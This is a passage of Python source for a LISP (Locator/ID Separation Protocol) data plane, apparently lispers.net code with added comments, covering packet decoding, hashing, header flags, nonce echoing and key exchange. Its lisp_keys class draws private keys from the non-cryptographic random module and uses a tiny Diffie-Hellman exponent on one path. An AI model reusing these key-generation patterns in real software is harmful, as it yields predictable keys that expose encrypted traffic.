            if (lisp_flow_logging): self.log_flow(False)
            return (self)
        else:
            self.packet_error = "bad-inner-version"
            if (stats): stats[self.packet_error].increment(orig_len)

            lprint("Cannot decode encapsulation, header version {}".format(hex(version)))

            packet = lisp_format_packet(packet[0:20])
            lprint("Packet header: {}".format(packet))
            if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
            return (None)

        self.inner_source.mask_len = self.inner_source.host_mask_len()
        self.inner_dest.mask_len = self.inner_dest.host_mask_len()
        self.inner_source.instance_id = iid
        self.inner_dest.instance_id = iid

        #
        # Process nonce-echo state for the source RLOC, creating state
        # the first time we hear from it.
        #
        if (lisp_nonce_echoing and is_lisp_packet):
            echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
            if (echo_nonce == None):
                rloc_str = self.outer_source.print_address_no_iid()
                echo_nonce = lisp_echo_nonce(rloc_str)

            nonce = self.lisp_header.get_nonce()
            if (self.lisp_header.is_e_bit_set()):
                echo_nonce.receive_request(lisp_ipc_socket, nonce)
            elif (echo_nonce.request_nonce_sent):
                echo_nonce.receive_echo(lisp_ipc_socket, nonce)

        #
        # If we decrypted, append the plaintext past the parsed headers.
        #
        if (decrypted): self.packet += packet[:packet_len]

        if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
        return (self)
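    #
    # Summary of decode() above (annotation added for readability): the
    # method peels the packet in stages -- (1) outer IPv4/IPv6 header with
    # a checksum check, (2) UDP header, (3) 8-byte LISP header, (4)
    # optional decryption selected by the header's KK bits, (5) inner
    # IPv4/IPv6/MAC header. It returns self on success and None on any
    # error, incrementing the matching counter in 'stats'.
    #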
    def swap_mac(self, mac):
        #
        # MAC addresses in LISP L2 encodings are byte-swapped within each
        # 16-bit word.
        #
        return (mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
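    #
    # Example (illustration only): byte positions [0,1,2,3,4,5] of the
    # input come out as [1,0,3,2,5,4], i.e. adjacent bytes of each
    # 16-bit word are exchanged in both directions, so applying
    # swap_mac() twice returns the original address.
    #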
    def strip_outer_headers(self):
        #
        # Remove outer IP header plus 8 bytes of UDP and 8 bytes of LISP
        # header.
        #
        offset = 16
        offset += 20 if (self.outer_version == 4) else 40
        self.packet = self.packet[offset::]
        return (self)
    def hash_ports(self):
        #
        # Fold the inner protocol number and TCP/UDP port pair into a
        # 16-bit value. For IPv4 fragments the ports may be missing, so
        # only the protocol is used.
        #
        packet = self.packet
        version = self.inner_version
        hashval = 0
        if (version == 4):
            protocol = struct.unpack("B", packet[9:10])[0]
            if (self.inner_is_fragment): return (protocol)
            if (protocol in [6, 17]):
                hashval = protocol
                hashval += struct.unpack("I", packet[20:24])[0]
                hashval = (hashval >> 16) ^ (hashval & 0xffff)

        if (version == 6):
            protocol = struct.unpack("B", packet[6:7])[0]
            if (protocol in [6, 17]):
                hashval = protocol
                hashval += struct.unpack("I", packet[40:44])[0]
                hashval = (hashval >> 16) ^ (hashval & 0xffff)

        return (hashval)
    def hash_packet(self):
        hashval = self.inner_source.address ^ self.inner_dest.address
        hashval += self.hash_ports()
        if (self.inner_version == 4):
            hashval = (hashval >> 16) ^ (hashval & 0xffff)
        elif (self.inner_version == 6):
            hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
            hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
            hashval = (hashval >> 16) ^ (hashval & 0xffff)

        self.udp_sport = 0xf000 | (hashval & 0xfff)
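    #
    # Illustration (not part of the original code): the hash folds the
    # inner addresses and ports down to 12 bits, which become the low
    # bits of the outer UDP source port:
    #
    #   hash = src_addr ^ dst_addr      e.g. 0x0a000001 ^ 0x0a000002 = 0x3
    #   hash += hash_ports()            mix in protocol and L4 ports
    #   udp_sport = 0xf000 | (hash & 0xfff)
    #
    # so encap source ports land in 0xf000-0xffff, letting underlay ECMP
    # spread flows while keeping per-flow packet ordering.
    #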
    def print_packet(self, s_or_r, is_lisp_packet):
        if (is_lisp_packet == False):
            eids = "{} -> {}".format(self.inner_source.print_address(),
                self.inner_dest.print_address())
            dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ...").format(bold(s_or_r, False),
                green(eids, False), self.inner_tos,
                self.inner_ttl, len(self.packet),
                lisp_format_packet(self.packet[0:60])))
            return

        if (s_or_r.find("Receive") != -1):
            ed = "decap"
            ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
        else:
            ed = s_or_r
            if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
                ed = "encap"

        rlocs = "{} -> {}".format(self.outer_source.print_address_no_iid(),
            self.outer_dest.print_address_no_iid())

        #
        # Control messages ride instance-id 0xffffff; there is no inner
        # header to print for them.
        #
        if (self.lisp_header.get_instance_id() == 0xffffff):
            line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " +
                "{}/{}, outer UDP: {} -> {}, ")
            line += bold("control-packet", False) + ": {} ..."

            dprint(line.format(bold(s_or_r, False), red(rlocs, False),
                self.outer_tos, self.outer_ttl, self.udp_sport,
                self.udp_dport, lisp_format_packet(self.packet[0:56])))
            return
        else:
            line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " +
                "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " +
                "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")

        if (self.lisp_header.k_bits):
            if (ed == "encap"): ed = "encrypt/encap"
            if (ed == "decap"): ed = "decap/decrypt"

        eids = "{} -> {}".format(self.inner_source.print_address(),
            self.inner_dest.print_address())

        dprint(line.format(bold(s_or_r, False), red(rlocs, False),
            self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
            green(eids, False), self.inner_tos, self.inner_ttl,
            len(self.packet), self.lisp_header.print_header(ed),
            lisp_format_packet(self.packet[0:56])))
    def print_eid_tuple(self):
        return (lisp_print_eid_tuple(self.inner_source, self.inner_dest))
    def get_raw_socket(self):
        iid = str(self.lisp_header.get_instance_id())
        if (iid == "0"): return (None)
        if (iid not in lisp_iid_to_interface): return (None)

        interface = lisp_iid_to_interface[iid]
        raw_socket = interface.get_socket()
        if (raw_socket == None):
            string = bold("SO_BINDTODEVICE", False)
            enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
            lprint("{} required for multi-tenancy support, {} packet".format(string, "drop" if enforce else "forward"))

            if (enforce): return (None)

        iid = bold(iid, False)
        device = bold(interface.device, False)
        dprint("Send packet on instance-id {} interface {}".format(iid, device))
        return (raw_socket)
    def log_flow(self, encap):
        global lisp_flow_log

        #
        # Flush the in-memory flow log to a writer thread when it fills
        # up or when the trigger file ./log-flows exists.
        #
        dump = os.path.exists("./log-flows")
        if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
            args = [lisp_flow_log]
            lisp_flow_log = []
            threading.Thread(target=lisp_write_flow_log, args=args).start()
            if (dump): os.system("rm ./log-flows")
            return

        ts = datetime.datetime.now()
        lisp_flow_log.append([ts, encap, self.packet, self])
    def print_flow(self, ts, encap, packet):
        ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
        flow = "{}: {}".format(ts, "encap" if encap else "decap")

        osrc = red(self.outer_source.print_address_no_iid(), False)
        odst = red(self.outer_dest.print_address_no_iid(), False)
        isrc = green(self.inner_source.print_address(), False)
        idst = green(self.inner_dest.print_address(), False)

        if (self.lisp_header.get_instance_id() == 0xffffff):
            flow += " {}:{} -> {}:{}, LISP control message type {}\n"
            flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
                self.inner_version)
            return (flow)

        if (self.outer_dest.is_null() == False):
            flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
            flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
                len(packet), self.outer_tos, self.outer_ttl)

        #
        # An encrypted payload cannot be parsed any further.
        #
        if (self.lisp_header.k_bits != 0):
            newline = "\n"
            if (self.packet_error != ""):
                newline = " ({})".format(self.packet_error) + newline

            flow += ", encrypted" + newline
            return (flow)

        #
        # Strip outer headers so the inner header can be examined.
        #
        if (self.outer_dest.is_null() == False):
            packet = packet[36::] if self.outer_version == 4 else packet[56::]

        protocol = packet[9:10] if self.inner_version == 4 else packet[6:7]
        protocol = struct.unpack("B", protocol)[0]

        flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
        flow = flow.format(isrc, idst, len(packet), self.inner_tos,
            self.inner_ttl, protocol)

        #
        # Show ports for TCP/UDP and the sequence number for ICMP.
        #
        if (protocol in [6, 17]):
            ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
            if (len(ports) == 4):
                ports = socket.ntohl(struct.unpack("I", ports)[0])
                flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)

        elif (protocol == 1):
            seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
            if (len(seq) == 2):
                seq = socket.ntohs(struct.unpack("H", seq)[0])
                flow += ", icmp-seq {}".format(seq)

        if (self.packet_error != ""):
            flow += " ({})".format(self.packet_error)

        flow += "\n"
        return (flow)
    def is_trace(self):
        ports = [self.inner_sport, self.inner_dport]
        return (self.inner_protocol == LISP_UDP_PROTOCOL and
            LISP_TRACE_PORT in ports)
#
# LISP data header flag bits (first 32-bit word of the header, RFC 6830):
# N = nonce present, L = locator-status-bits, E = echo-nonce request,
# V = map-version, I = instance-id, P = PITR, KK = 2-bit crypto key-id.
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header(object):
    def __init__(self):
        self.first_long = 0
        self.second_long = 0
        self.k_bits = 0

    def print_header(self, e_or_d):
        nonce = lisp_hex_string(self.first_long & 0xffffff)
        iid_lsb = lisp_hex_string(self.second_long).zfill(8)

        line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " +
            "iid/lsb: {}")
        return (line.format(bold(e_or_d, False),
            "N" if (self.first_long & LISP_N_BIT) else "n",
            "L" if (self.first_long & LISP_L_BIT) else "l",
            "E" if (self.first_long & LISP_E_BIT) else "e",
            "V" if (self.first_long & LISP_V_BIT) else "v",
            "I" if (self.first_long & LISP_I_BIT) else "i",
            "P" if (self.first_long & LISP_P_BIT) else "p",
            "K" if (self.k_bits in [2, 3]) else "k",
            "K" if (self.k_bits in [1, 3]) else "k",
            nonce, iid_lsb))

    def encode(self):
        packet_format = "II"
        first_long = socket.htonl(self.first_long)
        second_long = socket.htonl(self.second_long)

        header = struct.pack(packet_format, first_long, second_long)
        return (header)

    def decode(self, packet):
        packet_format = "II"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (False)

        first_long, second_long = struct.unpack(packet_format,
            packet[:format_size])

        self.first_long = socket.ntohl(first_long)
        self.second_long = socket.ntohl(second_long)
        self.k_bits = (self.first_long & LISP_K_BITS) >> 24
        return (True)

    def key_id(self, key_id):
        self.first_long &= ~(0x3 << 24)
        self.first_long |= ((key_id & 0x3) << 24)
        self.k_bits = key_id

    def nonce(self, nonce):
        self.first_long |= LISP_N_BIT
        self.first_long |= nonce

    def map_version(self, version):
        self.first_long |= LISP_V_BIT
        self.first_long |= version

    def instance_id(self, iid):
        if (iid == 0): return
        self.first_long |= LISP_I_BIT
        self.second_long &= 0xff
        self.second_long |= (iid << 8)

    def get_instance_id(self):
        return ((self.second_long >> 8) & 0xffffff)

    def locator_status_bits(self, lsbs):
        self.first_long |= LISP_L_BIT
        self.second_long &= 0xffffff00
        self.second_long |= (lsbs & 0xff)

    def is_request_nonce(self, nonce):
        return (nonce & 0x80000000)

    def request_nonce(self, nonce):
        self.first_long |= LISP_E_BIT
        self.first_long |= LISP_N_BIT
        self.first_long |= (nonce & 0xffffff)

    def is_e_bit_set(self):
        return (self.first_long & LISP_E_BIT)

    def get_nonce(self):
        return (self.first_long & 0xffffff)
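#
# Minimal sketch (not part of the original lispers.net code) showing how
# lisp_data_header fields round-trip through encode()/decode(). The helper
# below is illustrative only and is never called by the data plane.
#
def _lisp_data_header_example():
    hdr = lisp_data_header()
    hdr.instance_id(1000)       # sets the I bit, iid in the second long
    hdr.key_id(1)               # KK bits: select crypto key-id 1
    hdr.nonce(0x123456)         # sets the N bit, 24-bit nonce
    raw = hdr.encode()          # 8 bytes in network byte order

    copy = lisp_data_header()
    assert copy.decode(raw)
    assert copy.get_instance_id() == 1000
    assert copy.get_nonce() == 0x123456
    assert copy.k_bits == 1
    return copy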
class lisp_echo_nonce(object):
    def __init__(self, rloc_str):
        self.rloc_str = rloc_str
        self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
        self.request_nonce_sent = None
        self.echo_nonce_sent = None
        self.last_request_nonce_sent = None
        self.last_new_request_nonce_sent = None
        self.last_echo_nonce_sent = None
        self.last_new_echo_nonce_sent = None
        self.request_nonce_rcvd = None
        self.echo_nonce_rcvd = None
        self.last_request_nonce_rcvd = None
        self.last_echo_nonce_rcvd = None
        self.last_good_echo_nonce_rcvd = None
        lisp_nonce_echo_list[rloc_str] = self

    def send_ipc(self, ipc_socket, ipc):
        source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
        dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
        ipc = lisp_command_ipc(ipc, source)
        lisp_ipc(ipc, ipc_socket, dest)

    def send_request_ipc(self, ipc_socket, nonce):
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)

    def send_echo_ipc(self, ipc_socket, nonce):
        nonce = lisp_hex_string(nonce)
        ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
        self.send_ipc(ipc_socket, ipc)

    def receive_request(self, ipc_socket, nonce):
        old_nonce = self.request_nonce_rcvd
        self.request_nonce_rcvd = nonce
        self.last_request_nonce_rcvd = lisp_get_timestamp()
        if (lisp_i_am_rtr): return
        if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)

    def receive_echo(self, ipc_socket, nonce):
        if (self.request_nonce_sent != nonce): return
        self.last_echo_nonce_rcvd = lisp_get_timestamp()
        if (self.echo_nonce_rcvd == nonce): return

        self.echo_nonce_rcvd = nonce
        if (lisp_i_am_rtr): return
        self.send_echo_ipc(ipc_socket, nonce)

    def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
        #
        # If both sides entered request-nonce mode at the same time, break
        # the tie: the side with the higher RLOC address exits
        # request-nonce mode and echoes what the other side requests.
        #
        if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
            local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() else lisp_myrlocs[1]

            if (remote_rloc.address > local_rloc.address):
                mode = "exit"
                self.request_nonce_sent = None
            else:
                mode = "stay in"
                self.echo_nonce_sent = None

            collision = bold("collision", False)
            local_str = red(local_rloc.print_address_no_iid(), False)
            remote_str = red(remote_rloc.print_address_no_iid(), False)
            lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(collision,
                local_str, remote_str, mode))

        #
        # If we owe the other side an echo, return the nonce to echo and
        # leave echo mode.
        #
        if (self.echo_nonce_sent != None):
            nonce = self.echo_nonce_sent
            echoing = bold("Echoing", False)
            lprint("{} nonce 0x{} to {}".format(echoing,
                lisp_hex_string(nonce), red(self.rloc_str, False)))
            self.last_echo_nonce_sent = lisp_get_timestamp()
            self.echo_nonce_sent = None
            return (nonce)

        #
        # Stop requesting after LISP_NONCE_ECHO_INTERVAL with no echo.
        #
        nonce = self.request_nonce_sent
        last = self.last_request_nonce_sent
        if (nonce and last != None):
            if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
                self.request_nonce_sent = None
                lprint("Stop request-nonce mode for {}, nonce 0x{}".format(red(self.rloc_str, False), lisp_hex_string(nonce)))

                return (None)

        #
        # Start request-nonce mode with a fresh nonce, or continue with
        # the one already in flight. The 0x80000000 flag bit marks the
        # returned value as a request-nonce for the caller.
        #
        if (nonce == None):
            nonce = lisp_get_data_nonce()
            if (self.recently_requested()): return (nonce)

            self.request_nonce_sent = nonce
            lprint("Start request-nonce mode for {}, nonce 0x{}".format(red(self.rloc_str, False), lisp_hex_string(nonce)))

            self.last_new_request_nonce_sent = lisp_get_timestamp()

            #
            # Tell the companion ETR process to expect the echo (the RTR
            # runs both functions in one process and skips the IPC).
            #
            if (lisp_i_am_itr == False): return (nonce | 0x80000000)
            self.send_request_ipc(ipc_socket, nonce)
        else:
            lprint("Continue request-nonce mode for {}, nonce 0x{}".format(red(self.rloc_str, False), lisp_hex_string(nonce)))

        self.last_request_nonce_sent = lisp_get_timestamp()
        return (nonce | 0x80000000)

    def request_nonce_timeout(self):
        if (self.request_nonce_sent == None): return (False)
        if (self.request_nonce_sent == self.echo_nonce_rcvd): return (False)

        elapsed = time.time() - self.last_request_nonce_sent
        last_echo = self.last_echo_nonce_rcvd
        return (elapsed >= LISP_NONCE_ECHO_INTERVAL and last_echo == None)

    def recently_requested(self):
        last = self.last_request_nonce_sent
        if (last == None): return (False)

        elapsed = time.time() - last
        return (elapsed <= LISP_NONCE_ECHO_INTERVAL)

    def recently_echoed(self):
        if (self.request_nonce_sent == None): return (True)

        #
        # Did a good echo arrive within the interval?
        #
        last = self.last_good_echo_nonce_rcvd
        if (last == None): last = 0
        elapsed = time.time() - last
        if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return (True)

        #
        # Otherwise give a newly started request-nonce a grace period.
        #
        last = self.last_new_request_nonce_sent
        if (last == None): last = 0
        elapsed = time.time() - last
        return (elapsed <= LISP_NONCE_ECHO_INTERVAL)

    def change_state(self, rloc):
        if (rloc.up_state() and self.recently_echoed() == False):
            down = bold("down", False)
            good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
            lprint("Take {} {}, last good echo: {}".format(red(self.rloc_str, False), down, good_echo))

            rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
            rloc.last_state_change = lisp_get_timestamp()
            return

        if (rloc.no_echoed_nonce_state() == False): return

        if (self.recently_requested() == False):
            up = bold("up", False)
            lprint("Bring {} {}, retry request-nonce mode".format(red(self.rloc_str, False), up))

            rloc.state = LISP_RLOC_UP_STATE
            rloc.last_state_change = lisp_get_timestamp()

    def print_echo_nonce(self):
        req_sent = lisp_print_elapsed(self.last_request_nonce_sent)
        echo_rcvd = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)

        echo_sent = lisp_print_elapsed(self.last_echo_nonce_sent)
        req_rcvd = lisp_print_elapsed(self.last_request_nonce_rcvd)
        indent = space(4)

        output = "Nonce-Echoing:\n"
        output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " +
            "received: {}\n").format(indent, req_sent, indent, echo_rcvd)

        output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " +
            "sent: {}").format(indent, req_rcvd, indent, echo_sent)

        return (output)
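#
# Illustrative sketch (added annotation, not original code): a caller in
# request-nonce mode receives a value from get_request_or_echo_nonce()
# with bit 0x80000000 set. That flag bit only marks "request an echo"
# internally; the low 24 bits travel in the LISP header with the E and N
# bits set, as shown below. Never called by the data plane.
#
def _request_nonce_example(nonce_with_flag):
    hdr = lisp_data_header()
    if (hdr.is_request_nonce(nonce_with_flag)):
        hdr.request_nonce(nonce_with_flag & 0xffffff)  # sets E and N bits
    return hdr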
class lisp_keys(object):
    def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
        do_poly=use_poly):
        self.uptime = lisp_get_timestamp()
        self.last_rekey = None
        self.rekey_count = 0
        self.use_count = 0
        self.key_id = key_id
        self.cipher_suite = LISP_CS_1024
        self.dh_g_value = LISP_CS_1024_G
        self.dh_p_value = LISP_CS_1024_P
        self.curve25519 = None
        self.cipher_suite_string = ""
        if (do_curve):
            if (do_chacha):
                self.cipher_suite = LISP_CS_25519_CHACHA
                self.cipher_suite_string = "chacha"
            elif (os.getenv("LISP_USE_AES_GCM") != None):
                self.cipher_suite = LISP_CS_25519_GCM
                self.cipher_suite_string = "aes-gcm"
            else:
                self.cipher_suite = LISP_CS_25519_CBC
                self.cipher_suite_string = "aes-cbc"

            self.local_private_key = random.randint(0, 2**128 - 1)
            key = lisp_hex_string(self.local_private_key).zfill(32)
            self.curve25519 = curve25519.Private(key.encode())
        else:
            self.local_private_key = random.randint(0, 0x1fff)

        self.local_public_key = self.compute_public_key()
        self.remote_public_key = None
        self.shared_key = None
        self.encrypt_key = None
        self.icv_key = None
        self.icv = poly1305 if do_poly else hashlib.sha256
        self.iv = None
        self.get_iv()
        self.do_poly = do_poly

    def copy_keypair(self, key):
        self.local_private_key = key.local_private_key
        self.local_public_key = key.local_public_key
        self.curve25519 = key.curve25519
    def get_iv(self):
        #
        # Seed the IV randomly once, then increment per packet so IVs are
        # never reused under the same key. The packed width depends on
        # the cipher suite.
        #
        if (self.iv == None):
            self.iv = random.randint(0, LISP_16_128_MASK)
        else:
            self.iv += 1

        iv = self.iv
        if (self.cipher_suite == LISP_CS_25519_CHACHA):
            iv = struct.pack("Q", iv & LISP_8_64_MASK)
        elif (self.cipher_suite == LISP_CS_25519_GCM):
            iv_high = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
            iv_low = struct.pack("Q", iv & LISP_8_64_MASK)
            iv = iv_high + iv_low
        else:
            iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
        return (iv)
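    #
    # Note (annotation): the IV widths above track the cipher suite --
    # 8 bytes for chacha20, 12 bytes (4 + 8) for AES-GCM, and 16 bytes
    # for AES-CBC.
    #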
    def key_length(self, key):
        #
        # Length in bytes; keys are kept as hex strings, 2 chars per byte.
        #
        if (isinstance(key, int)): key = self.normalize_pub_key(key)
        return (old_div(len(key), 2))

    def print_key(self, key):
        k = self.normalize_pub_key(key)
        first = k[0:4].decode()
        last = k[-4::].decode()
        return ("0x{}...{}({})".format(first, last, self.key_length(k)))

    def normalize_pub_key(self, key):
        if (isinstance(key, int)):
            key = lisp_hex_string(key).zfill(256)
            return (key)

        if (self.curve25519): return (binascii.hexlify(key))
        return (key)

    def print_keys(self, do_bold=True):
        local = bold("local-key: ", False) if do_bold else "local-key: "
        if (self.local_public_key == None):
            local += "none"
        else:
            local += self.print_key(self.local_public_key)

        remote = bold("remote-key: ", False) if do_bold else "remote-key: "
        if (self.remote_public_key == None):
            remote += "none"
        else:
            remote += self.print_key(self.remote_public_key)

        dh = "ECDH" if (self.curve25519) else "DH"
        cs = self.cipher_suite
        return ("{} cipher-suite: {}, {}, {}".format(dh, cs, local, remote))

    def compare_keys(self, keys):
        if (self.dh_g_value != keys.dh_g_value): return (False)
        if (self.dh_p_value != keys.dh_p_value): return (False)
        if (self.remote_public_key != keys.remote_public_key): return (False)
        return (True)

    def compute_public_key(self):
        if (self.curve25519): return (self.curve25519.get_public().public)

        key = self.local_private_key
        g = self.dh_g_value
        p = self.dh_p_value
        return (int((g ** key) % p))
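    #
    # Classic Diffie-Hellman illustration for the non-curve25519 path
    # (toy numbers, not part of the original code): with g=5 and p=23,
    # private keys 6 and 15 give public keys 5**6 % 23 == 8 and
    # 5**15 % 23 == 19. Each side then raises the peer's public key to
    # its own private key: 19**6 % 23 == 8**15 % 23 == 2, the shared
    # secret. compute_shared_key() below does the same with the
    # configured LISP_CS_1024 g and p values.
    #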
    def compute_shared_key(self, ed, print_shared=False):
        key = self.local_private_key
        remote_key = self.remote_public_key

        compute = bold("Compute {} shared-key".format(ed), False)
        lprint("{}, key-material: {}".format(compute, self.print_keys()))

        if (self.curve25519):
            public = curve25519.Public(remote_key)
            self.shared_key = self.curve25519.get_shared_key(public)
        else:
            p = self.dh_p_value
            self.shared_key = (remote_key ** key) % p

        #
        # Print the shared secret only when debugging.
        #
        if (print_shared):
            k = self.print_key(self.shared_key)
            lprint("Computed shared-key: {}".format(k))

        #
        # Derive the encryption and ICV keys from the shared secret.
        #
        self.compute_encrypt_icv_keys()

        self.rekey_count += 1
        self.last_rekey = lisp_get_timestamp()

    def compute_encrypt_icv_keys(self):
        alg = hashlib.sha256
        if (self.curve25519):
            data = self.shared_key
        else:
            data = lisp_hex_string(self.shared_key)

        #
        # Build the KDF context: 0001 || "lisp-crypto" ||
        # (local-pub xor remote-pub) || 0100.
        #
        local_key = self.local_public_key
        if (type(local_key) != int): local_key = int(binascii.hexlify(local_key), 16)
        remote_key = self.remote_public_key
        if (type(remote_key) != int): remote_key = int(binascii.hexlify(remote_key), 16)
        context = "0001" + "lisp-crypto" + lisp_hex_string(local_key ^ remote_key) + "0100"

        key_material = hmac.new(context.encode(), data, alg).hexdigest()
        key_material = int(key_material, 16)

        #
        # Split the 256 bits of key material: the upper half encrypts,
        # the lower half authenticates.
        #
        encrypt_key = (key_material >> 128) & LISP_16_128_MASK
        icv_key = key_material & LISP_16_128_MASK
        encrypt_key = lisp_hex_string(encrypt_key).zfill(32)
        self.encrypt_key = encrypt_key.encode()
        fill = 32 if self.do_poly else 40
        icv_key = lisp_hex_string(icv_key).zfill(fill)
        self.icv_key = icv_key.encode()
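    #
    # Note (annotation): the derived keys are stored as hex strings,
    # zero-filled to 32 chars for poly1305 and 40 chars otherwise, which
    # is what do_icv() below expects when it hexlifies/unhexlifies them.
    #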
    def do_icv(self, packet, nonce):
        if (self.icv_key == None): return ("")
        if (self.do_poly):
            poly = self.icv.poly1305aes
            hexlify = self.icv.binascii.hexlify
            nonce = hexlify(nonce)
            hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
            if (lisp_is_python2()):
                hash_output = hexlify(hash_output.encode("raw_unicode_escape"))
            else:
                hash_output = hexlify(hash_output).decode()
        else:
            key = binascii.unhexlify(self.icv_key)
            hash_output = hmac.new(key, packet, self.icv).hexdigest()
            hash_output = hash_output[0:40]

        return (hash_output)

    def add_key_by_nonce(self, nonce):
        if (nonce not in lisp_crypto_keys_by_nonce):
            lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]

        lisp_crypto_keys_by_nonce[nonce][self.key_id] = self

    def delete_key_by_nonce(self, nonce):
        if (nonce not in lisp_crypto_keys_by_nonce): return
        lisp_crypto_keys_by_nonce.pop(nonce)

    def add_key_by_rloc(self, addr_str, encap):
        by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap

        if (addr_str not in by_rlocs):
            by_rlocs[addr_str] = [None, None, None, None]

        by_rlocs[addr_str][self.key_id] = self

        #
        # For the decap direction, tell the data-plane about the new key.
        #
        if (encap == False):
            lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
    def encode_lcaf(self, rloc_addr):
        pubkey = self.normalize_pub_key(self.local_public_key)
        key_len = self.key_length(pubkey)
        lcaf_len = (6 + key_len + 2)
        if (rloc_addr != None): lcaf_len += rloc_addr.addr_length()

        packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
            LISP_LCAF_SECURITY_TYPE, 0, socket.htons(lcaf_len), 1, 0)

        #
        # Encode the cipher-suite and key-length fields.
        #
        cipher_suite = self.cipher_suite
        packet += struct.pack("BBH", cipher_suite, 0, socket.htons(key_len))

        #
        # Pack the public-key material 64 bits at a time, byte-swapped.
        #
        for i in range(0, key_len * 2, 16):
            key_part = int(pubkey[i:i+16], 16)
            packet += struct.pack("Q", byte_swap_64(key_part))

        #
        # Append the RLOC address, if supplied.
        #
        if (rloc_addr):
            packet += struct.pack("H", socket.htons(rloc_addr.afi))
            packet += rloc_addr.pack_address()
        return(packet)
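    #
    # Wire layout produced above (Security Type LCAF; field names are
    # descriptive, sketched from the pack() calls, not normative):
    #
    #   AFI=LCAF | rsvd1 | flags | type=LISP_LCAF_SECURITY_TYPE | rsvd2 |
    #   length | key-count=1 | rsvd | cipher-suite | rsvd | key-length |
    #   key-material ... | [ AFI | RLOC-address ]
    #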
    def decode_lcaf(self, packet, lcaf_len):
        #
        # Parse the LCAF header when the caller hasn't already done so.
        #
        if (lcaf_len == 0):
            packet_format = "HHBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack(
                packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
                packet = packet[lcaf_len + 6::]
                return(packet)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]

        #
        # Process a Security Type LCAF: key-count, cipher-suite, key-length.
        #
        lcaf_type = LISP_LCAF_SECURITY_TYPE
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_count, rsvd, cipher_suite, rsvd, key_len = struct.unpack(
            packet_format, packet[:format_size])

        packet = packet[format_size::]
        key_len = socket.ntohs(key_len)
        if (len(packet) < key_len): return(None)

        #
        # Reject cipher-suites we don't implement.
        #
        cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
            LISP_CS_1024]
        if (cipher_suite not in cs_list):
            lprint("Cipher-suites {} supported, received {}".format(cs_list,
                cipher_suite))
            packet = packet[key_len::]
            return(packet)

        self.cipher_suite = cipher_suite

        #
        # Accumulate the remote public key, 64 bits at a time.
        #
        pubkey = 0
        for i in range(0, key_len, 8):
            key_part = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
            pubkey <<= 64
            pubkey |= key_part
        self.remote_public_key = pubkey

        #
        # For curve25519, the key must be a 32-byte string, not an integer.
        #
        if (self.curve25519):
            key = lisp_hex_string(self.remote_public_key)
            key = key.zfill(64)
            key_bytes = b""
            for i in range(0, len(key), 2):
                byte = int(key[i:i+2], 16)
                key_bytes += lisp_store_byte(byte)
            self.remote_public_key = key_bytes

        packet = packet[key_len::]
        return(packet)
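    #
    # Note (sketch): decode_lcaf() only stores the peer's public key; the
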